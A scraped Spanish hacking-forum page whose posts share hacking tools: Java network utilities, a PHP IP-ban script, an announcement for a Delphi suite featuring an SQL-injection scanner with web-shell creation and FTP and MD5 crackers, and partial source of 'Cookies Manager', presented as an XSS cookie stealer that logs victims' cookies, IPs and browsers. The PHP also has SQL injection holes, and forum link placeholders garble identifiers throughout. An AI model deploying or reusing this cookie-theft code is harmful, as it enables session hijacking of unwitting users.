    259.     public You are not allowed to view links. Register or Login regex(You are not allowed to view links. Register or Login code, You are not allowed to view links. Register or Login deaca, You are not allowed to view links. Register or Login hastaaca) {
    260.         You are not allowed to view links. Register or Login resultado = "";
    261.         Pattern regex1 = null;
    262.         Matcher regex2 = null;
    263.         regex1 = Pattern.compile(deaca + "(.*?)" + hastaaca);
    264.         regex2 = regex1.matcher(code);
    265.         if (regex2.find()) {
    266.             resultado = regex2.group(1);
    267.         }
    268.         return resultado;
    269.     }
    270.  
    271.     public You are not allowed to view links. Register or Login download(You are not allowed to view links. Register or Login url, You are not allowed to view links. Register or Login savefile) {
    272.         // Credits : Based on [url]http://stackoverflow.com/questions/921262/how-to-download-and-save-a-file-from-internet-using-java[/url]
    273.         // Thanks to Brian Risk
    274.         try {
    275.             You are not allowed to view links. Register or Login download_page = new You are not allowed to view links. Register or Login(url);
    276.             ReadableByteChannel down1 = Channels.newChannel(download_page.openStream());
    277.             You are not allowed to view links. Register or Login down2 = new You are not allowed to view links. Register or Login(savefile);
    278.             down2.getChannel().transferFrom(down1, 0, You are not allowed to view links. Register or Login.MAX_VALUE);
    279.             down1.close();
    280.             down2.close();
    281.             return true;
    282.         } catch (You are not allowed to view links. Register or Login e) {
    283.             return false;
    284.         }
    285.     }
    286.  
    287.     public You are not allowed to view links. Register or Login extract_file_by_url(You are not allowed to view links. Register or Login url) {
    288.         return url.substring(url.lastIndexOf('/') + 1);
    289.     }
    290.  
    291.     public You are not allowed to view links. Register or Login uri_split(You are not allowed to view links. Register or Login link, You are not allowed to view links. Register or Login opcion) {
    292.         You are not allowed to view links. Register or Login resultado = "";
    293.         try {
    294.             You are not allowed to view links. Register or Login url = new You are not allowed to view links. Register or Login(link);
    295.             if (opcion == "protocol") {
    296.                 resultado = url.getProtocol();
    297.             } else if (opcion == "authority") {
    298.                 resultado = url.getAuthority();
    299.             } else if (opcion == "host") {
    300.                 resultado = url.getHost();
    301.             } else if (opcion == "port") {
    302.                 resultado = You are not allowed to view links. Register or Login.valueOf(url.getPort());
    303.             } else if (opcion == "path") {
    304.                 resultado = url.getPath();
    305.             } else if (opcion == "query") {
    306.                 resultado = url.getQuery();
    307.             } else if (opcion == "filename") {
    308.                 resultado = url.getFile();
    309.             } else if (opcion == "ref") {
    310.                 resultado = url.getRef();
    311.             } else {
    312.                 resultado = "Error";
    313.             }
    314.  
    315.         } catch (You are not allowed to view links. Register or Login e) {
    316.             //
    317.         }
    318.         return resultado;
    319.     }
    320.  
    321.     public You are not allowed to view links. Register or Login md5_encode(You are not allowed to view links. Register or Login text) {
    322.         // Credits : Based on [url]http://www.avajava.com/tutorials/lessons/how-do-i-generate-an-md5-digest-for-a-string.html[/url]
    323.         You are not allowed to view links. Register or Login string_now = null;
    324.         try {
    325.             You are not allowed to view links. Register or Login generate = You are not allowed to view links. Register or Login.getInstance("MD5");
    326.             generate.update(text.getBytes());
    327.             byte[] result = generate.digest();
    328.             string_now = new You are not allowed to view links. Register or Login();
    329.             for (byte line : result) {
    330.                 string_now.append(You are not allowed to view links. Register or Login.format("%02x", line & 0xff));
    331.             }
    332.         } catch (You are not allowed to view links. Register or Login e) {
    333.             //
    334.         }
    335.         return string_now.toString();
    336.     }
    337.  
    338.     public You are not allowed to view links. Register or Login md5_file(You are not allowed to view links. Register or Login file) {
    339.         //Credits : Based on [url]http://stackoverflow.com/questions/304268/getting-a-files-md5-checksum-in-java[/url]
    340.         // Thanks to
    341.         You are not allowed to view links. Register or Login resultado = "";
    342.         try {
    343.             You are not allowed to view links. Register or Login convert = You are not allowed to view links. Register or Login.getInstance("MD5");
    344.             You are not allowed to view links. Register or Login file_now = new You are not allowed to view links. Register or Login(file);
    345.  
    346.             byte[] bytes_now = new byte[1024];
    347.  
    348.             int now_now = 0;
    349.             while ((now_now = file_now.read(bytes_now)) != -1) {
    350.                 convert.update(bytes_now, 0, now_now);
    351.             };
    352.             byte[] converting = convert.digest();
    353.             You are not allowed to view links. Register or Login result = new You are not allowed to view links. Register or Login();
    354.             for (int i = 0; i < converting.length; i++) {
    355.                 result.append(You are not allowed to view links. Register or Login.toString((converting[i] & 0xff) + 0x100, 16).substring(1));
    356.             }
    357.             resultado = result.toString();
    358.         } catch (You are not allowed to view links. Register or Login e) {
    359.             //
    360.         }
    361.         return resultado;
    362.     }
    363.  
    364.     public You are not allowed to view links. Register or Login get_ip(You are not allowed to view links. Register or Login hostname) {
    365.         You are not allowed to view links. Register or Login resultado = "";
    366.         try {
    367.             You are not allowed to view links. Register or Login getting_ip = You are not allowed to view links. Register or Login.getByName(hostname);
    368.             resultado = getting_ip.getHostAddress();
    369.         } catch (You are not allowed to view links. Register or Login e) {
    370.             //
    371.         }
    372.         return resultado;
    373.     }
    374. }
    375.  
    376. // The End ?
    377.  

    Ejemplos de uso :

    Código: Java
    1. package dhtools;
    2.  
    3. import java.util.ArrayList;
    4. import java.util.Collections;
    5.  
    6. public class Main {
    7.  
    8.     public static void main(You are not allowed to view links. Register or Login[] args) {
    9.         DH_Tools tools = new DH_Tools();
    10.         //String codigo = tools.toma("[url]http://localhost/[/url]");
    11.         //String codigo = tools.tomar("[url]http://localhost/login.php[/url]", "usuario=test&password=dsdsads&control=Login");
    12.         //tools.savefile("c:/xampp/texto.txt","texto");
    13.         //String codigo = tools.read_file("c:/xampp/texto.txt");
    14.         //String codigo = tools.console("ver");
    15.         //String codigo = tools.httpfinger("[url]http://www.petardas.com[/url]");
    16.         /*
    17.          ArrayList array = new ArrayList();
    18.          Collections.addAll(array, "[url]http://localhost/sql.php?id=dsaadsds[/url]", "b", "[url]http://localhost/sql.php?id=dsaadsds[/url]", "c");
    19.          ArrayList array2 = tools.repes(tools.cortar(array));
    20.          for (int i = 0; i < array2.size(); i++) {
    21.          System.out.println(array2.get(i));
    22.          }
    23.          */
    24.         //System.out.println(tools.regex("1sadasdsa2","1","2"));
    25.         //System.out.println(tools.response_code("[url]http://www.petardas.com/[/url]"));
    26.         /*
    27.          File savefile = new File("c:/xampp/mierda.avi");
    28.          if(tools.download("[url]http://localhost/test.avi[/url]",savefile)) {
    29.          System.out.println("yeah");
    30.          }
    31.          */
    32.  
    33.         //System.out.println(tools.extract_file_by_url("[url]http://localhost/dsaads/dsadsads/index.php[/url]"));
    34.         //System.out.println(tools.uri_split("[url]http://localhost/index.php?id=dadsdsa[/url]","query"));
    35.         //System.out.println(tools.md5_encode("123"));
    36.         //System.out.println(tools.md5_file("c:\\xampp\\texto.txt"));
    37.         //System.out.println(tools.get_ip("[url=http://www.petardas.com]www.petardas.com[/url]"));
    38.     }
    39.  
    40. }
    41.  

    Eso seria todo.

47
Back-end / [PHP] Ban System 0.3
« en: Enero 08, 2016, 03:23:28 pm »
Un simple script en PHP para banear una IP en una pagina.

Una imagen :



Los codigos :

index.php

Código: PHP
  1. <?php
  2.  
  3. // Ban System 0.3
  4. // (C) Doddy Hackman 2015
  5.  
  6. // Login
  7.  
  8. $username = "admin"; // Edit
  9. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
  10.  
  11. //
  12.  
  13. $index = "admin.php"; // Edit
  14.  
  15. if (You are not allowed to view links. Register or Login($_GET['poraca'])) {
  16.    
  17.     echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  18.  
  19. "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
  20. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
  21.   <head>
  22.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  23.      <title>Login</title>
  24.      <link rel="shortcut icon" href="images/icono.png">
  25.      <link href="style.css" rel="stylesheet" type="text/css" />
  26.   </head>
  27.   <body>
  28.      <center><br>
  29.         <div class="post">
  30.            <h3>Login</h3>
  31.            <div class="post_body">
  32.               <img src="images/login.jpg" width="562" height="440" />
  33.               <br />
  34.               <form action="" method=POST>
  35.                  Username : <input type=text size=30 name=username /><br
  36.  
  37. /><br />
  38.                  Password : <input type=password size=30 name=password
  39.  
  40. /><br /><br />
  41.                  <input type=submit name=login style="width: 100px;"
  42.  
  43. value=Login /><br /><br />
  44.               </form>
  45.            </div>
  46.         </div>
  47.      </center>
  48.   </body>
  49. </html>';
  50.    
  51.     if (You are not allowed to view links. Register or Login($_POST['login'])) {
  52.        
  53.         $test_username = $_POST['username'];
  54.         $test_password = You are not allowed to view links. Register or Login($_POST['password']);
  55.        
  56.         if ($test_username == $username && $test_password == $password) {
  57.             You are not allowed to view links. Register or Login("login", You are not allowed to view links. Register or Login($test_username . "@" . $test_password));
  58.             echo "<script>alert('Welcome idiot');</script>";
  59.             $ruta = "http://" . $_SERVER['HTTP_HOST'] . You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) . "/" . $index;
  60.             echo '<meta http-equiv="refresh" content="0; url=' . You are not allowed to view links. Register or Login($ruta) . '"
  61.  
  62. />';
  63.         } else {
  64.             echo "<script>alert('Fuck You');</script>";
  65.         }
  66.     }
  67.    
  68. } else {
  69.     echo '<meta http-equiv="refresh" content="0;
  70.  
  71. url=http://www.petardas.com" />';
  72. }
  73.  
  74. // The End ?
  75.  
  76. ?>
  77.  

admin.php

Código: PHP
  1. <?php
  2.  
  3. // Ban System 0.3
  4. // (C) Doddy Hackman 2015
  5.  
  6. You are not allowed to view links. Register or Login(0);
  7.  
  8. // Login
  9.  
  10. $username = "admin"; // Edit
  11. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
  12.  
  13. // DB
  14.  
  15. $host  = "localhost"; // Edit
  16. $userw = "root"; // Edit
  17. $passw = ""; // Edit
  18. $db    = "ban"; // Edit
  19.  
  20. if (You are not allowed to view links. Register or Login($_COOKIE['login'])) {
  21.    
  22.     $st = You are not allowed to view links. Register or Login($_COOKIE['login']);
  23.    
  24.     $plit = You are not allowed to view links. Register or Login("@", $st);
  25.     $user = $plit[0];
  26.     $pass = $plit[1];
  27.    
  28.     if ($user == $username and $pass == $password) {
  29.        
  30.         You are not allowed to view links. Register or Login($host, $userw, $passw);
  31.         You are not allowed to view links. Register or Login($db);
  32.        
  33.         echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
  34. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
  35.   <head>
  36.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  37.      <title>Ban System 0.3</title>
  38.      <link href="style.css" rel="stylesheet" type="text/css" />
  39.      <link rel="shortcut icon" href="images/icono.png">
  40.   </head>
  41.   <body>
  42.   <center>';
  43.        
  44.         You are not allowed to view links. Register or Login($host, $userw, $passw);
  45.         You are not allowed to view links. Register or Login($db);
  46.        
  47.         echo '         <br><img src="images/ban.png" /><br><br>';
  48.        
  49.         if (You are not allowed to view links. Register or Login($_POST['instalar'])) {
  50.            
  51.             $todo = "create table ban_system (
  52. id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  53. ip TEXT NOT NULL,
  54. PRIMARY KEY(id));
  55. ";
  56.            
  57.             if (You are not allowed to view links. Register or Login($todo)) {
  58.                 echo "<script>alert('Installed');</script>";
  59.                 echo '<meta http-equiv="refresh" content=0;URL=>';
  60.             } else {
  61.                 echo "<script>alert('Error');</script>";
  62.             }
  63.         }
  64.        
  65.         if (You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("show tables like 'ban_system'"))) {
  66.            
  67.             echo "<title>Ban System 0.3 Administracion</title>";
  68.            
  69.             if (You are not allowed to view links. Register or Login($_POST['ipadd'])) {
  70.                
  71.                 $ipfinal = You are not allowed to view links. Register or Login($_POST['ipadd']);
  72.                 $ipaz    = $_POST['ipadd'];
  73.                
  74.                 if ($ipfinal == -1 || $ipfinal === FALSE) {
  75.                     echo "<script>alert('IP invalid');</script>";
  76.                    
  77.                 } else {
  78.                    
  79.                     if (You are not allowed to view links. Register or Login("INSERT INTO ban_system (id,ip) values (NULL,'$ipaz')")) {
  80.                         echo "<script>alert('IP added');</script>";
  81.                     } else {
  82.                         echo "<script>alert('Error');</script>";
  83.                     }
  84.                    
  85.                    
  86.                 }
  87.             }
  88.            
  89.             if (You are not allowed to view links. Register or Login($_GET['del'])) {
  90.                 $id = $_GET['del'];
  91.                 if (@You are not allowed to view links. Register or Login("DELETE FROM ban_system where id ='$id'")) {
  92.                     echo "<script>alert('IP Deleted');</script>";
  93.                 } else {
  94.                     echo "<script>alert('Error');</script>";
  95.                 }
  96.             }
  97.            
  98.             echo '
  99.            <div class="post">
  100.                <h3>Add IP</h3>
  101.                   <div class="post_body">';
  102.            
  103.             echo "<br>
  104. <form action='' method=POST>
  105. <b>IP : </b><input type=text name=ipadd value=127.0.0.1> <input type=submit style='width: 100px;' value=Add>
  106. </form><br>";
  107.            
  108.             echo '                </div>
  109.            </div>';
  110.            
  111.            
  112.             $sql       = "select id from ban_system";
  113.             $resultado = You are not allowed to view links. Register or Login($sql);
  114.             $cantidad  = You are not allowed to view links. Register or Login($resultado);
  115.            
  116.             echo '
  117.            <div class="post">
  118.                <h3>Banned : ' . You are not allowed to view links. Register or Login($cantidad) . '</h3>
  119.                   <div class="post_body"><br>';
  120.            
  121.             if ($cantidad <= 0) {
  122.                 echo '<b>No entries found</b><br>';
  123.             } else {
  124.                
  125.                 echo '<table>
  126. <td><b>ID</b></td><td><b>IP</b></td><td><b>Option</b></td><tr>';
  127.                
  128.                 $sen = @You are not allowed to view links. Register or Login("select * from ban_system order by id ASC");
  129.                
  130.                 while ($ab = @You are not allowed to view links. Register or Login($sen)) {
  131.                    
  132.                     echo "<td>" . You are not allowed to view links. Register or Login($ab[0]) . "</td><td>" . You are not allowed to view links. Register or Login($ab[1]) . "</td><td><a href=?del=" . You are not allowed to view links. Register or Login($ab[0]) . ">Delete</a></td><tr>";
  133.                 }
  134.                
  135.                 echo '</table>';
  136.                
  137.             }
  138.            
  139.             echo '                <br></div>
  140.            </div>';
  141.            
  142.             echo "</table>
  143. </center>
  144. ";
  145.             //
  146.         } else {
  147.            
  148.             echo '
  149.            <div class="post">
  150.                <h3>Installer</h3>
  151.                   <div class="post_body">';
  152.            
  153.             echo "
  154. <form action='' method=POST>
  155. <h2>Do you want install Ban System ?</h2><br>
  156. <input type=submit style='width: 100px;' name=instalar value=Install><br><br>
  157. </form>";
  158.            
  159.             echo '                </div>
  160.            </div>';
  161.            
  162.         }
  163.        
  164.         echo '
  165.   <br><h3>(C) Doddy Hackman 2015</h3><br>
  166.   </center>
  167.   </body>
  168. </html>';
  169.        
  170.         You are not allowed to view links. Register or Login();
  171.         You are not allowed to view links. Register or Login(1);
  172.        
  173.     } else {
  174.         echo "<script>alert('Fuck You');</script>";
  175.     }
  176. } else {
  177.     echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
  178. }
  179.  
  180. ?>
  181.  

style.css

Código: CSS
  1. /*
  2.  
  3. ==-----------------------------------==
  4. || Name : DH Theme                   ||
  5. || Version : 0.8                     ||  
  6. || Author : Doddy H                  ||
  7. || Description: Templante            ||
  8. || Date : 14/1/2015                  ||
  9. ==-----------------------------------==
  10.  
  11. */
  12.  
  13. body {
  14.    background:transparent url("images/fondo.jpg") repeat scroll 0 0;
  15.    color:gray;
  16.    font-family:helvetica,arial,sans-serif;
  17.    font-size:14px;
  18.    text-align:center;
  19. }
  20.  
  21. a:link {
  22.    text-decoration:none;
  23.    color:orange;
  24. }
  25. a:visited {
  26.    color:orange;
  27. }
  28. a:hover {
  29.    color:orange;
  30. }
  31.  
  32. td,tr {
  33.    border-style:solid;
  34.    border-color: gray;
  35.    border-width: 1px;
  36.    background: black;
  37.    border: solid #222 2px;
  38.    color:gray;
  39.    font-family:helvetica,arial,sans-serif;
  40.    font-size:14px;
  41.    text-align:center;
  42.  
  43.    word-wrap: break-word;
  44.    word-break:break-all;
  45. }
  46.  
  47. input {
  48.    border-style:solid;
  49.    border-color: gray;
  50.    border-width: 1px;
  51.    background: black;
  52.    border: solid #222 2px;
  53.    color:gray;
  54.    font-family:helvetica,arial,sans-serif;
  55.    font-size:14px;
  56. }
  57.  
  58. .post {
  59.    background-color:black;
  60.    color:gray;
  61.    margin-bottom:10px;
  62.    width:600px;
  63.    word-wrap: break-word;
  64. }
  65.  
  66. .post h3 {
  67.    background-color:black;
  68.    color:orange;
  69.    background-color:#000;
  70.    border: solid #222 2px;
  71.    -webkit-border-radius: 4px;
  72.    -moz-border-radius: 4px;
  73.    border-radius: 4px;
  74.    padding:5px 10px;
  75. }
  76.  
  77. .post_body {
  78.    background-color:black;
  79.    margin:-20px 0 0 0;
  80.    color:white;
  81.    background-color:#000;
  82.    border: solid #222 2px;
  83.    -webkit-border-radius: 4px;
  84.    -moz-border-radius: 4px;
  85.    border-radius: 4px;
  86.    padding:5px 10px;
  87. }
  88.  
  89. /* The End ? */
  90.  

ban.php

Código: PHP
  1. <?php
  2.  
  3. // Ban System 0.3
  4. // (C) Doddy Hackman 2015
  5.  
  6. You are not allowed to view links. Register or Login(0);
  7.  
  8. // DB
  9.  
  10. $host  = "localhost"; // Edit
  11. $userw = "root"; // Edit
  12. $passw = ""; // Edit
  13. $db    = "ban"; // Edit
  14.  
  15. //
  16.  
  17. $texto = "Acceso Denegado"; // Edit
  18.  
  19. You are not allowed to view links. Register or Login($host, $userw, $passw);
  20. You are not allowed to view links. Register or Login($db);
  21.  
  22. $ipa = You are not allowed to view links. Register or Login($_SERVER['REMOTE_ADDR']);
  23. $ip  = $_SERVER['REMOTE_ADDR'];
  24.  
  25. if ($ip == "::1") {
  26.     $ipa = 1;
  27. }
  28.  
  29. if ($ipa == -1 || $ipa === FALSE) {
  30.     echo "<script>alert('Good try');</script>";
  31. } else {
  32.    
  33.     if ($ip == "::1") {
  34.         $ip = "127.0.0.1";
  35.     }
  36.     $re = You are not allowed to view links. Register or Login("select ip from ban_system where ip='$ip'");
  37.    
  38.     if (You are not allowed to view links. Register or Login($re) > 0) {
  39.         echo "<center><h1>" . You are not allowed to view links. Register or Login($texto) . "</h1></center>";
  40.         You are not allowed to view links. Register or Login(1);
  41.     }
  42.    
  43. }
  44.  
  45. You are not allowed to view links. Register or Login();
  46.  
  47. // The End ?
  48.  
  49. ?>
  50.  

test.php

Código: PHP
  1. <?php
  2.  
  3. include("ban.php");
  4.  
  5. echo "aca toy";
  6.  
  7. ?>
  8.  

Si quieren bajar el programa lo pueden hacer de You are not allowed to view links. Register or Login.

48
Delphi / [Delphi] Project Arsenal X 0.2 (Regalo de navidad)
« en: Diciembre 25, 2015, 02:55:51 pm »
Version en Delphi de este programa similar al juego HackTheGame pero con la unica diferencia de que todo es real xD , tiene las siguientes opciones :

  • Gmail Inbox[/li]
  • Ping[/li]
  • Get IP[/li]

  • K0bra (Scanner SQLI)[/li]
    [++] Comprobar vulnerabilidad
    [++] Buscar numero de columnas
    [++] Buscar automaticamente el numero para mostrar datos
    [++] Mostras tablas
    [++] Mostrar columnas
    [++] Mostrar bases de datos
    [++] Mostrar tablas de otra DB
    [++] Mostrar columnas de una tabla de otra DB
    [++] Mostrar usuarios de mysql.user
    [++] Buscar archivos usando load_file
    [++] Mostrar un archivo usando load_file
    [++] Mostrar valores
    [++] Mostrar informacion sobre la DB
    [++] Crear una shell usando outfile
    [++] Todo se guarda en logs ordenados

  • Panel Control[/li]
  • FTP Cracker[/li]
  • Whois[/li]
  • Downloader[/li]
  • Locate IP[/li]
  • MD5 Cracker[/li]
  • Port Scanner[/li]
  • Bing Scanner[/li]
  • Console[/li][/list]

    Una imagen :



    Un video con ejemplos de uso :



    Para leer el correo necesitan tener instalado You are not allowed to view links. Register or Login para que el inbox les funcione , tambien necesitan habilitar la opcion de "Acceso de aplicaciones menos seguras" desde este You are not allowed to view links. Register or Login para la cuenta Gmail que van a usar.

    Si quieren bajar el programa lo pueden hacer de aca :

    You are not allowed to view links. Register or Login.
    You are not allowed to view links. Register or Login.

    Eso seria todo.

49
Back-end / [PHP] Cookies Manager 0.6
« en: Diciembre 18, 2015, 05:42:11 pm »
Hoy les traigo una version mejorada de este cookie stealer que les permite capturar,guardar y generar cookies para el robo de cookies usando XSS.

Tiene las siguientes opciones :

  • Cookie Stealer con generador de TinyURL[/li]
  • Pueden ver los cookies que les devuelve una pagina[/li]
  • Pueden crear cookies con los datos que quieran[/li]
  • Panel oculto con login para entrar usen ?poraca para encontrar al login[/li][/list]

    Una imagen :



    Los codigos :

    index.php

    Código: PHP
    1. <?php
    2.  
    3. // Cookies Manager 0.6
    4. // (C) Doddy Hackman 2015
    5.  
    6. // Login
    7.  
    8. $username = "admin"; // Edit
    9. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
    10.  
    11. //
    12.  
    13. $index = "imagen.php"; // Edit
    14.  
    15. if (You are not allowed to view links. Register or Login($_GET['poraca'])) {
    16.    
    17.     echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
    18. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
    19.   <head>
    20.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    21.      <title>Login</title>
    22.      <link rel="shortcut icon" href="images/icono.png">
    23.      <link href="style.css" rel="stylesheet" type="text/css" />
    24.   </head>
    25.   <body>
    26.      <center><br>
    27.         <div class="post">
    28.            <h3>Login</h3>
    29.            <div class="post_body">
    30.               <img src="images/login.jpg" width="562" height="440" />
    31.               <br />
    32.               <form action="" method=POST>
    33.                  Username : <input type=text size=30 name=username /><br /><br />
    34.                  Password : <input type=password size=30 name=password /><br /><br />
    35.                  <input type=submit name=login style="width: 100px;" value=Login /><br /><br />
    36.               </form>
    37.            </div>
    38.         </div>
    39.      </center>
    40.   </body>
    41. </html>';
    42.    
    43.     if (You are not allowed to view links. Register or Login($_POST['login'])) {
    44.        
    45.         $test_username = $_POST['username'];
    46.         $test_password = You are not allowed to view links. Register or Login($_POST['password']);
    47.        
    48.         if ($test_username == $username && $test_password == $password) {
    49.             You are not allowed to view links. Register or Login("login", You are not allowed to view links. Register or Login($test_username . "@" . $test_password));
    50.             echo "<script>alert('Welcome idiot');</script>";
    51.             $ruta = "http://" . $_SERVER['HTTP_HOST'] . You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) . "/" . $index;
    52.             echo '<meta http-equiv="refresh" content="0; url=' . You are not allowed to view links. Register or Login($ruta) . '" />';
    53.         } else {
    54.             echo "<script>alert('Fuck You');</script>";
    55.         }
    56.     }
    57.    
    58. } else {
    59.     echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
    60. }
    61.  
    62. // The End ?
    63.  
    64. ?>
    65.  

    imagen.php

    Código: PHP
    1. <?php
    2.  
    3. // Cookies Manager 0.6
    4. // (C) Doddy Hackman 2015
    5.  
    6. // Login
    7.  
    8. $username = "admin"; // Edit
    9. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
    10.  
    11. // DB
    12.  
    13. $host  = "localhost"; // Edit
    14. $userw = "root"; // Edit
    15. $passw = ""; // Edit
    16. $db    = "cookies"; // Edit
    17.  
    18. // Functions
    19.  
    20. function hex_encode($text)
    21. {
    22.     $texto = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($text), 2, '%');
    23.     return $texto = '%' . You are not allowed to view links. Register or Login($texto, 0, You are not allowed to view links. Register or Login($texto) - 1);
    24. }
    25.  
    26. function parsear_cookie($leyendo)
    27. {
    28.    
    29.     $leyendo   = You are not allowed to view links. Register or Login("comment=", "", $leyendo);
    30.     $leyendo   = You are not allowed to view links. Register or Login("Set-Cookie: ", "", $leyendo);
    31.     $contenido = You are not allowed to view links. Register or Login(";", $leyendo);
    32.    
    33.     $nombre       = "";
    34.     $valor_cookie = "";
    35.     $expires      = "";
    36.     $path         = "";
    37.     $domain       = "";
    38.     $secure       = "false";
    39.     $httponly     = "false";
    40.    
    41.     foreach ($contenido as $valor) {
    42.        
    43.         if (You are not allowed to view links. Register or Login("/expires=(.*)/", $valor, $regex)) {
    44.             $expires = $regex[1];
    45.         }
    46.        
    47.         elseif (You are not allowed to view links. Register or Login("/path=(.*)/", $valor, $regex)) {
    48.             $path = $regex[1];
    49.         } elseif (You are not allowed to view links. Register or Login("/domain=(.*)/", $valor, $regex)) {
    50.             $domain = $regex[1];
    51.         } elseif (You are not allowed to view links. Register or Login("/secure=(.*)/", $valor, $regex)) {
    52.             $secure = $regex[1];
    53.         } elseif (You are not allowed to view links. Register or Login("/httponly=(.*)/", $valor, $regex)) {
    54.             $httponly = $regex[1];
    55.         }
    56.        
    57.         else {
    58.            
    59.             if (You are not allowed to view links. Register or Login("/(.*)=(.*)/", $valor, $regex)) {
    60.                 $nombre       = $regex[1];
    61.                 $valor_cookie = $regex[2];
    62.             }
    63.            
    64.         }
    65.        
    66.     }
    67.    
    68.     return You are not allowed to view links. Register or Login(
    69.         $nombre,
    70.         $valor_cookie,
    71.         $expires,
    72.         $path,
    73.         $domain,
    74.         $secure,
    75.         $httponly
    76.     );
    77.    
    78. }
    79.  
    80. function ver_cookies_de_pagina($pagina)
    81. {
    82.     $cookies = "";
    83.     if (!You are not allowed to view links. Register or Login('curl_exec')) {
    84.         $options = You are not allowed to view links. Register or Login(
    85.             'http' => You are not allowed to view links. Register or Login(
    86.                 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
    87.             )
    88.         );
    89.         $context = You are not allowed to view links. Register or Login($options);
    90.         You are not allowed to view links. Register or Login($pagina);
    91.         foreach ($http_response_header as $valores) {
    92.             if (You are not allowed to view links. Register or Login("/Set-Cookie/", $valores)) {
    93.                 $valores = You are not allowed to view links. Register or Login("Set-Cookie:", "", $valores);
    94.                 $cookies = $cookies . You are not allowed to view links. Register or Login($valores) . "\n";
    95.             }
    96.         }
    97.     } else {
    98.         $nave = You are not allowed to view links. Register or Login($pagina);
    99.         You are not allowed to view links. Register or Login($nave, CURLOPT_TIMEOUT, 5);
    100.         You are not allowed to view links. Register or Login($nave, CURLOPT_RETURNTRANSFER, 1);
    101.         You are not allowed to view links. Register or Login($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    102.         You are not allowed to view links. Register or Login($nave, CURLOPT_HEADER, 1);
    103.         You are not allowed to view links. Register or Login($nave, CURLOPT_NOBODY, 1);
    104.         $contenido = You are not allowed to view links. Register or Login($nave);
    105.         You are not allowed to view links. Register or Login($nave);
    106.         $leyendo = You are not allowed to view links. Register or Login("\n", You are not allowed to view links. Register or Login($contenido));
    107.        
    108.         foreach ($leyendo as $valores) {
    109.             if (You are not allowed to view links. Register or Login("/Set-Cookie/", $valores)) {
    110.                 $valores = You are not allowed to view links. Register or Login("Set-Cookie:", "", $valores);
    111.                 $cookies = $cookies . You are not allowed to view links. Register or Login($valores) . "\n";
    112.             }
    113.         }
    114.     }
    115.     return $cookies;
    116. }
    117.  
    118. function toma($target)
    119. {
    120.     $code = "";
    121.     if (You are not allowed to view links. Register or Login('curl_exec')) {
    122.         $nave = You are not allowed to view links. Register or Login($target);
    123.         You are not allowed to view links. Register or Login($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
    124.         You are not allowed to view links. Register or Login($nave, CURLOPT_TIMEOUT, 5);
    125.         You are not allowed to view links. Register or Login($nave, CURLOPT_RETURNTRANSFER, true);
    126.         $code = You are not allowed to view links. Register or Login($nave);
    127.     } else {
    128.         $options = You are not allowed to view links. Register or Login(
    129.             'http' => You are not allowed to view links. Register or Login(
    130.                 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
    131.             )
    132.         );
    133.         $context = You are not allowed to view links. Register or Login($options);
    134.         $code    = You are not allowed to view links. Register or Login($target);
    135.     }
    136.     return $code;
    137. }
    138.  
    139. //
    140.  
    141. You are not allowed to view links. Register or Login(0);
    142.  
    143. You are not allowed to view links. Register or Login($host, $userw, $passw);
    144. You are not allowed to view links. Register or Login($db);
    145.  
    146. if (You are not allowed to view links. Register or Login($_GET['id'])) {
    147.    
    148.     if (You are not allowed to view links. Register or Login($_GET['id'])) {
    149.         error();
    150.     }
    151.    
    152.     $dia = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("d.m.Y"));
    153.     $ip  = You are not allowed to view links. Register or Login($_SERVER["REMOTE_ADDR"]);
    154.    
    155.     if ($ip == "::1") {
    156.         $ip = "127.0.0.1";
    157.     }
    158.    
    159.     $info = You are not allowed to view links. Register or Login($_SERVER["HTTP_USER_AGENT"]);
    160.     $ref  = You are not allowed to view links. Register or Login($_SERVER["HTTP_REFERER"]);
    161.    
    162.     $cookie = You are not allowed to view links. Register or Login($_GET['id']);
    163.    
    164.     You are not allowed to view links. Register or Login("INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')");
    165.    
    166.     You are not allowed to view links. Register or Login("Location:http://www.google.com.ar");
    167.    
    168. }
    169.  
    170. elseif (You are not allowed to view links. Register or Login($_COOKIE['login'])) {
    171.    
    172.     $st = You are not allowed to view links. Register or Login($_COOKIE['login']);
    173.    
    174.     $plit = You are not allowed to view links. Register or Login("@", $st);
    175.     $user = $plit[0];
    176.     $pass = $plit[1];
    177.    
    178.     if ($user == $username and $pass == $password) {
    179.        
    180.         echo '
